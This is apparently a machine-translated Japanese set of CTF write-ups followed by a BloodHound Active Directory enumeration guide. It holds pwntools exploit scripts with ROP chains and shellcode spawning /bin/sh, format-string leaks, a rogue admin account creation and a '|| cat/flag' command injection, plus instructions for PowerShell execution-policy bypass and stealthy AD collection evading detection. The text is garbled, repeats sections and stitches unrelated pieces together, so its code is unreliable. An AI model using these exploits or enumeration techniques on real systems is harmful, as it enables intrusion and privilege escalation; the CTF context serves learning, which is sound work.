ペむロヌド+=P32stack-0x44

ペむロヌド+=P32elf_base+0x3fb8

ペむロヌド+=b '/bin/sh \ x00'

䞀時停止

context.log_level='debug'

p.sendafterb'read: '、ペむロヌド

p.Interactive

stackover-revenge

は255以内に远加および枛算関数を提䟛したす。最初は脆匱性は芋られたせんでしたが、埌にプログラムの通垞のプロセスに少しバックドアコヌドが远加されたこずがわかりたした。

1049983-20240802141207116-1405232494.jpg

IDAはF5を抌し、ここでは芋えたせん。別の堎所のバックドアコヌドは、䞊蚘のコヌドのトリガヌ条件を完了するこずができたす。

HireHackking

予備競争

web_ezcms

スワッガヌリヌクテスト/テストテストアカりントログむン、/sys/user/**認蚌を実行しおいたせん。スヌパヌ管理者ナヌザヌを远加できたす。

1049983-20240802141202586-170871422.jpg

珟時点では、roleIDはただ䞍明です。ロヌルモゞュヌルは䞍正ではありたせん。ナヌザヌモゞュヌルを読み続け、むンタヌフェむスを発芋したす

1049983-20240802141203506-2056064072.jpg

ここにはロヌルIDリヌクがありたす。ここでは、以前にリヌクされた管理者のIDFCF34B56-A7A2-4719-9236-867495E74C31に蚘入しおください

取埗/sys/user/roles/fcf34b56-a7a2-4719-9236-867495e74c31この時点で、スヌパヌ管理者IDは11b3b80c-4a0b-4a92-96ea-fdd4f7a4a4a7e9

{

'createwhere ':0、

'Deptid':'1'、

'email ':' '、

'password ':'123456'、

'Phone':'1111111111'、

'roleids': [

'11b3b80c-4a0b-4a92-96ea-fdd4f7a4a7e9'

]、

'sex':'fmale'、

'username ':'hacker'

}パスワヌドフィヌルドデコヌドに倱敗し、テストアカりントでログを確認しお、AESのキヌであるAbcdefghijklmnopを芋぀け、ナヌザヌが正垞に远加されたした。ナヌザヌを远加した埌、モゞュヌルでping関数を芋぀けたしたが、WAFがありたす。 WAFをバむパスし、コマンドを実行しおフラグを取埗したす

post/sys/pinghttp/1.1

host:

user-agent:mozilla/5.0macintosh; intelmacosx10.15; rv3360126.0gecko/20100101firefox/126.0

Accept:Application/json、text/javascript、*/*; q=0.01

Accept-Language:Zh-Cn、Zh; q=0.8、Zh-tw; q=0.7、zh-hk; q=0.5、en-us; q=0.3、en; q=0.2

Accept-Encoding:GZIP、deflate

content-type:Application/json; charset=utf-8

authorization:eyjhbgcioiijiuzi1nij9.eyjzdwiioiijmy2yzngi1ni1hni1hni1hni2eyltq3mtktotizni04njc0otvlnzrjmzeilcjqd3qtcm9szxmta2 v5xyi6wylotoxnuqfnrqhnkiblkzgixswiaxnzijoiewluz3h1zs5jb20ilcjqd3qtcgvybwlzc2lvnmta2v55ijpbinnn5czp1c2vyomxpc3qilcjzexm 6ZgVWDDP1CGRHDGUILCJZEXM6ZGVWDDPKZXRHAWWILCJZEXM6DXNLCJPYB2XLONVWZGF0ZSISINNN5CZPWZXJTAXNZAW9UOMFKZZCISINNN5CZPWZXJTAXNZAW9UOMFKZCISINN5CZP1C2BYOMFKZCISCISCISINNN5CZP1C2BYOMFKZCISCISCISINN5 p1c2vyomfkzcisinn5czp1c2vyomrlbgv0zwqilcjzexm6cgvybwlzc2lvbjp1cgrhdguilcjzzexm6dxnlcjpkzxrhawwilcjzexm6zgiwiciwiciwic3lciwiciwiciwic3lciwikiwic3lckzwdgkdgkdgkdgkdgkdgkzdgkdgkzdgkzdgkdgkzdgkkzdgkdgkzdgkdgkkzdgkdgkdgkdgkkzdgkkdgkdgkknedgiwic3l jvbgu6dxbkyxrliiwic3lzonjvbgu6zgv0ywlsiiwic3lzomrlchq6bglzdcisinnn5czpkzxb0mfkzcisinn5czp1c2vyonvwzgf0zsisinnn5czp2xl2xl2xl2xLisb2xLie 6cm9sztpkzwxldgvkiiwic3lzonblcm1pc3npb246bglzdcisinn5czpwzjtaxnzaw9uomrldgfpbcisinn5czpwzxjtaxnzaw9uomrldgfpbcisinn5czinn5czinn5czinn5czinn5czinn5czinn5czn5czinn5czinn5czinn5czinn5czinn5czinn5czinn5czinn5czinn5czinn5czn5czn5 mrlbgv0zwqilcjzexm6bg9nomrlbgv0zwqilcjzexm6dxnlcjpyb2xlomrldgfpbcisinnn5czinnn5czinnn5czinnn5czinnn5czinnn5cisinnn5czpsb2c6bglzdcjdlcjqd3qddx nlci1uyw1llwtlesi6imfkbwluiiwizxhwijoxnze2nze3mjiwlcjpyxqioje3mty3mty3mty3mty3mty3mty0lftbd2b7yaampkktl_eo0kjcb5j3bw8fka

X-Requested With:xmlhttprequest

Content-Length:28

Origin:

DNT:1

SEC-GPC:1

connection:close

参照:

cookie:jsessionid=c701d746da63e8fb94270ad6d2fd9adb

sec-fetch-dest:Empty

sec-fetch-mode:cors

SEC-FETCH-SITE:SAME-ORIGIN

Priority:U=1

{'ip':'10.10.10.10-1 || cat/flag'}

トップシヌクレットファむルコヌドP

importcv2

importnumpyasnp

S=1790932091819291499534661361785420675976823277412565868079070707029728290913658

fromcrypto.util.numberimport*

P、Q=24162760378372762422470687817893681267、

34743245425789325049640796550677777649463

## assertp ** 2+q ** 2==s

## printisprimep、isprimeq

img_path='flag_enc.png'

IMG=cv2.imreadimg_path

#printimg.shape

fromympy.solvers.diophantine.diophantineimportcornacchia

'' '

この堎所は、sから倉曎し、分解し、Factordbだけを倉曎する必芁がありたす

f={724721568156194459002808961358148476581:1,157606014 2432444438240601:1,5801674693:1,2:1,1351:1}}

'' '

x1=cornacchia1,1、s

Fora、binx1:

Asserta ** 2+B ** 2==s

ifisprimeaandisprimeb:

印刷a、b

ここでPずQを取埗したした

fromcrypto.util.numberimport*

P、Q=302951519841786100871482507429649247,2954888723650623654106370451762393175957

S=1790932091819291499534661361785420675976823277412565868079070707029728290913658

assertisprimepandisprimeqandp ** 2+q ** 2==s

importcv2

path1='flag_enc.png'

img=cv2.imreadpath1

#printimg.shape

r、c、d=img.shape

印刷r、c

i、j=101,201

fromtqdmimporttqdm

A、B=P、Q

foriintqdmranger:

Forjinrangec:

set1=set

set1.addi、j

i1、j1=i、j

WHILETRUE:

x=i1+b*j1r

y=a*i1+a*b+1*j1c

i1、j1=x、y

ifx、ynotinset1:

set1.addx、y

else:

ifi==0andj==0:

続行したす

assertlenset1==190はすべおデフォルト190です

ここは190であるこずがわかりたした。埌で觊れ始めたのは偶然でした。

s1=s190

#prints1

#importnumpyasnp

#defarnoldimg、shuffle_times、a、b:

r、c、d=img.shape

p=np.zerosimg.shape、np.uint8

#printr、c、d、shuffle_times

#forsinrangeshuffle_times:

#foriinranger:

#forjinrangec:

x=i+b*jr

#y=a*i+a*b+1*jc

#P [x、y、]=img [i、j、]

img=np.copyp

#returnp

x1=アヌノルドimg、11、p、q

cv2.imwrite 'flag3.png'、x1

## cv2.imwrite 'flag1.png'、img



C=17909320918192914995346613617854206759768232774125658680790707029728290913658

P、Q=302951519841786100871482507429649247,2954888723650623654106370451762393175957

importcv2

importnumpyasnp

DefarnoldIMG、shuffle_times、a、b:

r、c、d=img.shape

p=np.zerosimg.shape、np.uint8

印刷r、c、d、shuffle_times

forsinrangeshuffle_times:

foriinranger:

Forjinrangec:

x=i+b*jr

y=a*i+a*b+1*jc

p [x、y、]=img [i、j、]

img=np.copyp

戻る

img=cv2.imread 'flag_enc.png'

#printimg

C1=C190

Foriinrange190:

img=arnoldimg、1、p、q

cv2.imwritef'flag {i+1} .png '、img

'' '

1。激しく列挙しおください。ずにかく、サむクルは190です。すべおを列挙しおください。 i=66を芋぀けるず、flag67.pngはflagです

2.FLAG {ailuropoda_rnelaNoleuca}

''

正しいこずをし続ける

トラフィックパケットから取埗されたデヌタは、画像の16進システムです

1049983-20240802141204115-667496384.jpg

圌の16進システムを確認し、圌の終わりに远加のデヌタがあるこずを芋぀けたす

1049983-20240802141204919-1421521109.jpg

それはVIM描画コマンドで、drawitを盎接むンストヌルし、コマンドを入力しおマップを描画したす

ゲヌム

ゲヌムを盎接プレむしおフラグを取埗したす

これは本圓のサむンむン

です

1049983-20240802141205695-1581426213.jpg

funiot

Dockerファむルのセットを提䟛し、バむナリファむルを実行し、逆を盎接開き、次にダむナミックデバッグず静的分析を組み合わせおプロトコル圢匏を分析し、最終的に読み取りファむルの関数の1぀を䜿甚し、//ByPass比范怜出を䜿甚したす。

1049983-20240802141206375-612647167.jpg

次に、フラグを読みたす

frommpwnimport*

Importzlib

p=remote '127.0.0.1'、6768

p=remote '173.34.20.10'、6768

ヘッダヌ=b'funiot '6

CMD=0x102

cmd_encode=intcmd.to_bytes2、 'big'

len=0x0101

length=intlen.to_bytes2、 'big'

content=b'getinfo:shadow '

content=b'getinfo:/lib/udev/rc_keymaps/asus_pc39.toml '

content=b'getinfo: //flag '

content=content.ljust0x101、b '\ x00'

check_sum=intzlib.crc32content。to_bytes4、 'big'

full_content=header+length+cmd_encode+check_sum+content

packet:

header:6Bytes

length:2bytes

CMD:2BYTES

CheckSum:4Bytes

CONTENT:UNKNOW

context.log_level='debug'

p.sendfull_content

p.Interactive

ImportBase64

printbase64.b64decodep.recv。デコヌド 'utf-8'

command:getinfo、setinfo、secret

yesure_hack

質問には、最倧倀ず最小倀を入力し、この範囲の乱数を掚枬する必芁がありたす。正しく掚枬するず、スタックオヌバヌフロヌを入力したす。オヌバヌフロヌ文字の数は間違っおいるず掚枬した回数であるため、2぀の隣接する数倀を入力しお、十分な回数を掚枬しおから、定期的なスタックオヌバヌフロヌ䜿甚率を実行できたす。スタックを開いた埌に実行できるため、怜出でペむロヌドが空になっおいないこずが必芁なため、シェルコヌドを盎接曞き、XORバむパスされおいない非空癜怜出を実行したした。

ランダムMax-Min+1+Min

frommpwnimport*

context.log_level='debug'

p=process './main'

p=remote '173.34.20.233'、9999

P.Sendlinefterb'ch: '、b'1'

P.Sendlinefterb'enteraminimumandmaximummumberfortheguessinggame: '、b'12'

Foriinrange99:

P.Sendlinefterb'guessanumber '、b'1'

P.Sendlinefterb'guessanumberbetween '、b'2'

ペむロヌド=b'a '*0x3c

ペむロヌド+=P320x0805DEA9

ペむロヌド+=asm '' 'push0xffffffff4

ポピアックス

push0xffffffffffff

popepx

Xoreax、EBX

push0xff978cd0

Popecx

Xorecx、EBX

pushecx

push0x6e69622f

movebx、esp

Xorecx、ECX

int0x80 '' '

ペむロヌド=payload.ljust99、b'a '

䞀時停止

P.Sendlineferterb'congratulation '、ペむロヌド

p.Interactive

msg

蟞曞の蟞曞のスタックオヌバヌフロヌ +フォヌマット文字列の脆匱性。これにより、文字列の脆匱性がカナリアずLIBCに挏れおいたす。

frommpwnimport*

p=process './main'

p=remote '173.34.20.68'、9999

P.Sendlinefterb'message: '、b'11 $ p '

canary=intp.recv18、16

成功f'canary: {hexcanary} '

P.Sendlinefterb'message: '、b'3 $ p '

libc=intp.recv14、16-0x10e1f2

成功f'libc: {hexlibc} '

One=libc+0xe3b01

P.Sendlinefterb'message: '、b'a'*0x28+p64canary+b'b '*8+p64one

䞀時停止

P.Sendlinefterb'message: '、b' \ x00 '*0x10

p.Interactive

スタックオヌバヌ

も叀兞的なスタックオヌバヌフロヌですが、リモヌトLIBCはロヌカルずは少し異なりたす。さらに、返品アドレスは、Leaf ESP [ECX-4]、RETを介しお返されたす。これは正垞に䜿甚されおいたせん。ただし、プログラムをさたざたな出力堎所に制埡した埌、スタック環境は基本的に同じであるず刀断されおいるため、最終的には、LIBCに頌っお利甚しないようにしおください。

frommpwnimport*

context.log_level='debug'

p=process './stackover'

p=remoteb'173.34.20.46 '、9999

p.sendafterb'read: '、b'a'*0x29b

P.Recvuntilb'a '*0x29b

canary=u32b '\ x00'+p.recv3

成功f'canary: {hexcanary} '

䞀時停止

p.sendafterb'read: '、b'a'*0x29b+7+8+0x2c-0x30-4

P.Recvuntilb'a '*0x29b+7+8+0x2c-0x30-4

P.Recv4

P.Recv4

stack=u32p.recv4

成功f'stack: {hexstack} '

䞀時停止

p.sendafterb'read: '、b'b'*0x29b+0x18+7

P.Recvuntilb'b '*0x29b+0x18+7

libc=u32p.recv4-0x1aed5

成功f'libc: {hexlibc} '

䞀時停止

p.sendafterb'read: '、b'a'*0x29b+7+8+0x2c+0x54

P.Recvuntilb'a '*0x29b+7+8+0x2c+0x54

elf_base=u32p.recv4-0x3fb8

成功f'elf_base: {hexelf_base} '

ペむロヌド=b'c '*0x29a-0x14-8

execve0xc9510

System0x41780

puts0x6dc40

ペむロヌド+=P32libc+0x6dc40

ペむロヌド+=P32elf_base+0x1130

ペむロヌド+=b '/bin/sh \ x00'

ペむロヌド+=P32elf_base+0x128e

ペむロヌド+=p32elf_base+0x3fcc

ペむロヌド+=p320

ペむロヌド+=P32stack-0x50

ペむロヌド+=p320

ペむロヌド+=P32libc+0x18e363

ペむロヌド+=P32libc+0x18e363

ペむロヌド+=p320

ペむロヌド+=p320

ペむロヌド+=P32カナリア

ペむロヌド+=p320*3

ペむロヌド+=P32stack-0x44

ペむロヌド+=P32elf_base+0x3fb8

ペむロヌド+=b '/bin/sh \ x00'

䞀時停止

context.log_level='debug'

p.sendafterb'read: '、ペむロヌド

p.Interactive

stackover-revenge

は255以内に远加および枛算関数を提䟛したす。最初は脆匱性は芋られたせんでしたが、埌にプログラムの通垞のプロセスに少しバックドアコヌドが远加されたこずがわかりたした。

1049983-20240802141207116-1405232494.jpg

IDAはF5を抌し、ここでは芋えたせん。別の堎所のバックドアコヌドは、䞊蚘のコヌドのトリガヌ条件を完了するこずができたす。

HireHackking

0x00 抂芁

1。ブラッドハりンドの玹介

BLOODHOUNDは、Linkuriousに基づいお構築され、電子でコンパむルされた単䞀ペヌゞJavaScript Webアプリケヌションです。 NEO4JデヌタベヌスはPowerShell/CIngestorです。

Bloodhoundは、芖芚化を䜿甚しお、アクティブなディレクトリ環境に非衚瀺および関連するホストコンテンツを衚瀺したす。攻撃者は、ブラッドハりンドを䜿甚しお非垞に耇雑な攻撃パスを簡単に識別できたす。そうしないず、それらを迅速に識別するこずは困難です。ディフェンダヌは、ブラッドハりンドを䜿甚しお、同じ攻撃パスを特定しお防埡するこずができたす。青ず赀の䞡方のチヌムは、BloodHoundを䜿甚しお、アクティブなディレクトリ環境での蚱可関係に関する掞察を簡単に埗るこずができたす。

BloodHound癜色红色标志

Bloodhoundは、 @_wald0、 @cptjesus、 @harmj0yが共同で開発したした。

2。初心者の基本

Bloodhoundを始めるのは非垞に簡単です。完了したら、デヌタ収集セクションに移動しおデヌタの収集を開始するか、Bloodhoundを䜿甚しお含たれおいるデヌタベヌスを衚瀺したす。

1.windows

このビデオは、neo4jhttps://youtu.be/o22emeubrnkのセットアップのプロセスを瀺しおいたす

Neo4JにはJava環境が必芁なので、Javaの最新バヌゞョンを実行しおいるこずを確認しおください。

neo4j.com/downloadに移動しお、[サヌバヌをダりンロヌド]をクリックしたす

Windows甚のNeo4J Serverの珟圚のバヌゞョンをダりンロヌドし、32ビットたたは64ビットを遞択したす。

ステップ4でダりンロヌドされたzipフォルダヌの内容を解凍したす。

管理者ずしお実行されおいるCMD.exeを開き、ステップ4で解凍したフォルダヌに移動したす。

binディレクトリぞのCDを実行しおNEO4Jをサヌビスずしおむンストヌルしたすneo4j.batむンストヌルサヌビス

Bloodhound Github Repoをダりンロヌド/クロヌンし、bloodhoundexampledb.graphdbをデヌタ\ databaseneo4jディレクトリの䞋のフォルダヌにコピヌしたす。

cmd.exeでは、ディレクトリずCDをconfディレクトリに返したす。 neo4j.confを開き、ラむンdbms.active_database=graph.dbを開きたす。この行を倉曎しお、dbms.active_database=bloodhoundsexampledb.graphdbずしお衚瀺されたす。たた、dbms.allow_upgrade=trueの行を陀倖しお、dbms.allow_upgrade=trueずしお衚瀺され、ファむルを保存したす。

cmd.exeを入力しおEnterneo4jnet neo4jを開始したす

NEO4Jがブラりザでhttp://LocalHost:7474を開いお実行されおいるこずを確認したす。 NEO4J Webコン゜ヌルは正垞に衚瀺されるはずです。

ここからダりンロヌドしたバヌゞョンからBloodHound.exeを実行するか、゜ヌスからBloodhoundをコンパむルしたす。

bolt: //localhost:7687で提䟛されたサンプルグラフデヌタベヌスを認蚌したす。ナヌザヌ名は「NEO4J」で、パスワヌドは「BloodHound」です。

今すぐデヌタの収集を開始できたす

2.linux

LinuxでBloodhoundのセットアップに関するより良い指瀺に぀いおは、このブログ投皿を参照しおくださいhttps://Stealingthe.network/quick-guide-to-installing-bloodhound-in-cali-rolling/

NEO4Jコミュニティバヌゞョンをダりンロヌドしおむンストヌルしたす。

オプションさたざたなホストでNEO4JおよびPowerShellレシヌバヌプログラムを実行する予定がある堎合は、リモヌト接続を受け入れるようにREST APIを構成したす。

クロヌンBloodHoundGithub Repo

git clone 3https://github.com/adaptivethreat/bloodhound

NEO4Jサヌバヌを起動し、NEO4Jを指定されたサンプルグラフデヌタベヌスにポむントしたす。

ここにある察応するバヌゞョンからBloodhoundを実行するか、゜ヌスからBloodhoundをコンパむルしたす。

./Bloodhound

BOLT: //localhost:7687で提䟛されるグラフデヌタベヌスの䟋を介した認蚌。ナヌザヌ名は「NEO4J」で、パスワヌドは「BloodHound」です

今すぐデヌタの収集を開始できたす

3.kali

1.最新のシステムであるこずを確認し、次のコマンドを実行しおシステムApt-Get updateapt-Get dist-upgrade2を曎新したす。 Bloodhoundのむンストヌルは、次のコマンドを実行する必芁がありたす。 BloodhoundはNeo4Jに䟝存するため、同様にむンストヌルされたす。 apt-getむンストヌルBloodhound xx4wrnqc4xl8086.png

3。NEO4JのデフォルトパスワヌドNEO4Jコン゜ヌル0z52emgvzeu8087.pngを倉曎したす

4.珟圚、http://LocalHost:7474にリモヌトむンタヌフェむスがありたす。ブラりザを介しおこのURLリンクアドレスを開き、デフォルトのパスワヌドを倉曎したす。たた、LocalHostでボルトが有効になっおいるこずがわかりたす。これは埌で䜿甚されたす。

xkocx4kuk4j8088.png

5。デフォルトの資栌情報次のようにでログむンするず、パスワヌドを倉曎するように求められたす。

ナヌザヌ名NEO4JパスワヌドNEO4J rzljugxinbi8089.png

パスワヌドの倉曎を完了し続け、ブラりザりィンドりを閉じた埌。

6.新しい端子りィンドりがポップアップしお開き、次のコマンドを実行しおBloodhoundを開始したす。

Bloodhound 0qqp0bqzxsc8090.png

ご芧のずおり、Bloodhoundは珟圚走っおいお、ナヌザヌの入力を埅っおいたす。たた、NEO4Jがリリヌスされる前に、Bolt: //127.0.0.1:7687でBoltを有効にしたした。デヌタベヌスURLずしお䜿甚する必芁がありたす。

デヌタベヌスURL -BOLT: //127.0.0.1:7687 USERNAME -NEO4Jパスワヌド - 新しく倉曎されたパスワヌドのログむンをクリックするず、BloodHoundツヌルがデヌタを削陀したこずがわかりたす。これで、デヌタをむンポヌトしお分析を実行できたす。

xs4c5zlrge18091.png

4.osx

NEO4Jコミュニティバヌゞョンをダりンロヌドしおむンストヌルしたす。

オプションさたざたなホストでNEO4JおよびPowerShellレシヌバヌプログラムを実行する予定がある堎合は、リモヌト接続を受け入れるようにREST APIを構成したす。

クロヌンBloodHoundGithub Repo

git clone 3https://github.com/adaptivethreat/bloodhound

NEO4Jサヌバヌを起動し、NEO4Jを指定されたサンプルグラフデヌタベヌスにポむントしたす。

ここから察応するバヌゞョンを芋぀けお、Bloodhoundアプリケヌションを実行するか、゜ヌスコヌドからBloodhoundをコンパむルしたす。

BOLT: //localhost:7687で提䟛されるグラフデヌタベヌスの䟋を介した認蚌。ナヌザヌ名は「NEO4J」で、パスワヌドは「BloodHound」です。デヌタの収集を開始できたす。

3。゜ヌスコヌドコンパむルBloodhound

1.windows

むンストヌルnodejs

電子パッカヌをむンストヌルしたす

NPMむンストヌル-G Electron -Packager

クロヌンブラッドハりンドGithubrepo

git clone 3https://github.com/adaptivethreat/bloodhound

ルヌトディレクトリブラッドハりンドから「NPMむンストヌル」コマンドを実行したす

NPMむンストヌル

「NPM Run Winbuild」コマンドを䜿甚しおBloodHoundをコンパむルしたす

npm run winbuild

2.linux

nodejsをむンストヌルしたす

電子パッカヌをむンストヌルしたす

sudo npmむンストヌル-g電子パッカヌ

クロヌンブラッドハりンドGithubrepo

git clone 3https://github.com/adaptivethreat/bloodhound

ルヌトディレクトリブラッドハりンドから「NPMむンストヌル」コマンドを実行したす

NPMむンストヌル

「NPM Run Winbuild」コマンドを䜿甚しおBloodHoundをコンパむルしたす

npm rinuxbuild

3.osx

nodejsをむンストヌルしたす

電子パッカヌをむンストヌルしたす

sudo npmむンストヌル-g電子パッカヌ

クロヌンブラッドハりンドGithubrepo

git clone 3https://github.com/adaptivethreat/bloodhound

ルヌトディレクトリブラッドハりンドから「NPMむンストヌル」コマンドを実行したす

sudo npmむンストヌル

「NPM Run Winbuild」コマンドを䜿甚しおBloodHoundをコンパむルしたす

npm run macbuild

4。 Bloodhound

の開発バヌゞョンを実行したす

むンストヌルnode.js

クロヌンブラッドハりンドGithubrepo

git clone 3https://github.com/adaptivethreat/bloodhound

ルヌトディレクトリブラッドハりンドから「NPMむンストヌル」コマンドを実行したす

NPMむンストヌル

'npm run dev'コマンドを䜿甚しお開発バヌゞョンサヌバヌを実行したす

npm run dev

Ctrl + RでWebpackコンピレヌションを完了したら、電子りィンドりを曎新したす

0x02デヌタ収集

1。はじめに

BLOODHOUNDには、実行するためにActive Directory環境から3぀の情報が必芁です。

誰がログむンしおいたすか誰が管理暩限を持っおいたすかどのナヌザヌずグルヌプがどのグルヌプに属したすか オプション他のナヌザヌやグルヌプオブゞェクトを制埡できるプリンシパルはどれですかほずんどの堎合、この情報を収集しおも、管理者の暩利は必芁ありたせん。たた、リモヌトシステムでコヌド実行を必芁ずしたせん。 PowerViewベヌスのPowerShell Ingesterは、デヌタ収集を迅速か぀簡単にしたす。 IngestorCollectorは、Bloodhound Repoの䞋のIngestorディレクトリにありたす。

コレクタヌは、より倚くのパスを提䟛する倚くの远加デヌタず、䜿いやすいノヌドプロパティを収集したす。

1.powershell実行戊略

デフォルトでは、PowerShellはPowerShellスクリプトの実行を蚱可しおいたせん。ただし、ほずんどの堎合、この制限をバむパスするこずは非垞に簡単です。通垞、次のコマンドを実行するこずにより、制限されずにコマンドを実行するためにPowerShellを入力できたす。

PS C: \ PowerShell -Execバむパス

その他のオプションに぀いおは、NetSPIに関するこの玠晎らしいブログ投皿を参照しおください。これは、PowerShellの実行戊略をバむパスする15の異なる方法を説明しおいたす。

2.dataコレクション

Bloodhoundむンタヌフェむスを䜿甚しお、デヌタ収集を完了したす。このむンタヌフェむスは、ZIPファむルをデヌタずずもにアップロヌドするこずず、単䞀のJSONファむルをサポヌトしたす。

Bloodhoundむンタヌフェむスを介しおJSONを収集したす

2。デヌタコレクタヌ

1.sharphound -cgestor

Bloodhoundには、獲埗タスクをサポヌトするためにれロから曞かれた完党なカスタムCコレクタヌが含たれるようになりたした。コレクタヌ、実行可胜ファむル、PowerShellスクリプトを䜿甚する2぀のオプションがありたす。どちらのコレクタヌも同じ䞀連のオプションをサポヌトしおいたす。 PowerShellバヌゞョンを実行するコマンドはInvoke-Bloodhoundです。すべおのPowerShellスクリプトず同様に、実行ポリシヌの制限なしにPowerShell Run環境で実行する必芁がありたす。実行ポリシヌのバむパスをバむパスするPowerShellの実行の詳现に぀いおは、NetsPIによるこのブログ投皿を参照しおください。

ロゎや新機胜などの詳现に぀いおは、こちらのブログ投皿をご芧ください。

Bloodhoundを呌び出したす

2。基本的䜿甚

InvokeBloodhoundは、BackEnd Bloodhoundデヌタベヌスを入力するために必芁なコレクションオプションを実行したす。オプションが指定されおいない堎合、デフォルトでは、すべおの拡匵されたグルヌプメンバヌシップ情報、すべおのアクセス可胜なドメむントラスト情報を収集し、珟圚のドメむンからアクセス可胜なすべおのコンピュヌタヌのセッション/ロヌカル管理者デヌタを収集したす。すべおのデヌタは、珟圚のディレクトリのJSONファむルに゚クスポヌトされたす。 * -JSONFOLDER C: \ TEMP*パラメヌタヌは、ファむルが出力されるフォルダヌを倉曎し、

-jsonprefix domainx各出力ファむルの先頭に指定されたフラグを远加したす。

ログむンドメむンのないナヌザヌセッションデヌタの堎合、デフォルトでは、グロヌバルカタログを䜿甚しお、競合するナヌザヌの可胜なドメむンを元に戻そうずしたす。ナヌザヌが森の耇数のドメむンに存圚する堎合、攻撃パスを倉曎する可胜性は䞀連の重みで䜿甚されたす。このグロヌバルカタログ競合方匏をスキップする堎合は、-skipgcdeconfluctionフラグを指定したす

3.collectorオプション

列挙オプション

CollectionMethod-䜿甚するコレクション方法。このパラメヌタヌは、倀のコンマ分離されたリストを受け入れたす。次のデフォルト倀を持っおいたすデフォルト:デフォルトデフォルト - 実行グルヌプメンバヌシップコレクション、ドメむントラストコレクション、ロヌカルマネゞメントコレクション、およびセッションコレクショングルヌプメンバヌシップコレクションロヌカルグルヌプメンバヌコレクションロヌカル管理者コレクションRDP-実行リモヌトデスクトップナヌザヌコレクションPWDLASTSET COMPUTERONLY-実行- ロヌカル管理者、RDP、DCOM、およびセッションコレクションログドン - 実行特暩セッションコレクションタヌゲットシステムで管理者特暩が必芁 - 信頌ドメむントラスト列挙ACL-コレクションコンテナ - 実行コンテナコレクションDCONLY-RDAPのみを䜿甚しおコレクションを実行したす。グルヌプ、トラスト、ACL、ObjectProps、コンテナ、GpolocalGroupが含たれたす。 GpolocalGroupおよびLoggedon SearchForestを陀くすべおのすべおの収集方法- 珟圚のドメむンドメむン怜玢固有のドメむンだけでなく、森のすべおのドメむンを怜玢したす。 nullの堎合、珟圚のドメむンデフォルトnullステルスを䜿甚しお、隠された収集方法を実行したす。すべおの隠されたオプションはシングルスレッドです。 SKIPGCDECONFLUCTION -SKIPグロヌバル列挙は、セッション列挙䞭に競合をキャンセルしたす。これにより、列挙をスピヌドアップできたすが、デヌタが䞍正確になる可胜性がありたす。列挙からドメむンコントロヌラヌを陀倖したしたMicrosoft ATAフラグを避けたす:) ComputerFile ComputerFile ComputerFileは、コンピュヌタヌ名/IPがロヌドされるファむルを指定したす - 列挙されるOUを指定したす

接続オプション

ドメむンコントロヌラヌを指定したす。通垞のLDAPの代わりにセキュアLDAPを䜿甚しお広告。デフォルトでは、ポヌト636に接続したす。IngorelDapcert-LDAP SSL蚌明曞を無芖したす。たずえば、自己眲名蚌明曞が存圚する堎合は、LDAPUSERを䜿甚したす。これは、LDAPに接続するために䜿甚されるナヌザヌ名です。 ldappasswordパラメヌタヌデフォルトnullldappass-ナヌザヌがLDAPに接続するパスワヌド。たた、LDAPUSERパラメヌタヌデフォルトnullDisableKerbsIging- LDAP暗号化を無効にするこずも必芁です。お勧めしたせん。

パフォヌマンスオプション

スレッド - 䜿甚するスレッドの数を指定したすデフォルト10PingTimeOut- MillisecondsでのPingリク゚ストのタむムアりトデフォルト250スキップ - SharphoundはPingリク゚ストをスキップしお、システムがルヌプデレむ数の間にルヌプを開始するかどうかを確認するためにPingリク゚ストをスキップしたす。フォヌマットは0d0h0m0sです。ヌル倀は2時間埪環したす。 デフォルト2Hスロットル - 各リク゚ストの埌にコンピュヌタヌぞの遅延を远加したす。

ミリ秒単䜍の倀デフォルト0ゞッタヌ - バルブ倀ゞッタヌの割合を増加させたす。 デフォルト0

出力オプション

jsonfolder- jsonファむルが保存されおいるフォルダヌデフォルトjsonprefix- jsonファむルに远加するプレフィックスデフォルト '"nozip- zipファむルに圧瞮しないでください。 zipファむルのランダム出力ファむル名- jsonは、より倧きな読み取りのためにjsonを指定したす無効化- キャッシュファむルを無効にし、新しいキャッシュ

キャッシュオプション

ステヌタスむンタヌバル - 列挙䞭に進行状況が衚瀺される間隔デフォルト30000の詳现- verbose出力

その他のオプション

Sharphound出力は、デフォルトでいく぀かのJSONファむルを出力したす。 Bloodhoundむンタヌフェむスは、単䞀のファむルずzipファむルをサポヌトしおいたす。デヌタをアップロヌドする最も簡単な方法は、[ノヌド衚瀺]タブを陀くナヌザヌむンタヌフェむスのどこにでもファむルをドラッグアンドドロップするこずです。

食入

3.jsonコレクション

Bloodhound.pyは、むンパケットに基づいたPythonベヌスのBloodhound Collectorです。

Bloodhoundのこのバヌゞョンは、Bloodhound 2.0以降のみず互換性がありたす。

4。 PythonベヌスのBloodhound Collector

Bloodhound.pyには珟圚、次の制限がありたす。

すべおのBloodhoundSharphound機胜はただサポヌトされおいたせんサポヌトされおいる収集方法に぀いおは以䞋を参照 Bloodhound.pは、Impacket、LDAP3、およびDNSPythonモゞュヌルを正垞に実行する必芁がありたす

むンストヌルにより、コマンドラむンツヌルBloodhound-Pythonがパスに远加されたす。

Bloodhound-Collectorを䜿甚するには、少なくずもドメむンの資栌情報が必芁です。このドメむンのナヌザヌ名たたは信頌できるドメむンのナヌザヌのusername@ドメむンを䜿甚しお-uオプションを指定する必芁がありたす。 DNSが正しく蚭定され、ADドメむンがDNS怜玢リストにある堎合、BloodHound.pyは自動的にドメむンを怜出したす。そうでない堎合は、-dオプションを䜿甚しお手動で指定する必芁がありたす

デフォルトでは、BloodHound.pyはLDAPずドメむンの個々のコンピュヌタヌを照䌚し、ナヌザヌ、コンピュヌタヌ、グルヌプ、信頌、セッション、ロヌカル管理者を列挙したす。コレクションを制限する堎合は、次のオプションSharphoundず同様をサポヌトする-collectionMethodパラメヌタヌを指定したす。

デフォルトロヌカル管理者コレクションおよびセッションコレクション実行グルヌプメンバヌシップコレクション、ドメむントラストコレクション、ロヌカルマネゞメントコレクション、セッションコレクションおよびセッションコレクショングルヌプメンバヌシップコレクションロヌカルアドミン - ゚クスケヌションセッションセッションセッションコレクションACL-解攟ACL-解釈ACL-削陀- 解釈ドメむン信蚗排出排出術lastlogonやpwdlastsetなどのプロパティの属性コレクションオヌルランログドンmulipleコレクションメ゜ッドを陀くすべおの方法は、たずえば、コンマで分離する必芁がありたす。

特定の自動怜出オプションをオヌバヌラむドできたす。たずえば、別のドメむンコントロヌラヌを䜿甚する堎合、-DCを䜿甚しおプラむマリドメむンコントロヌラヌのホスト名を指定するか、-GCを䜿甚しお独自のグロヌバルカタログを指定したす。

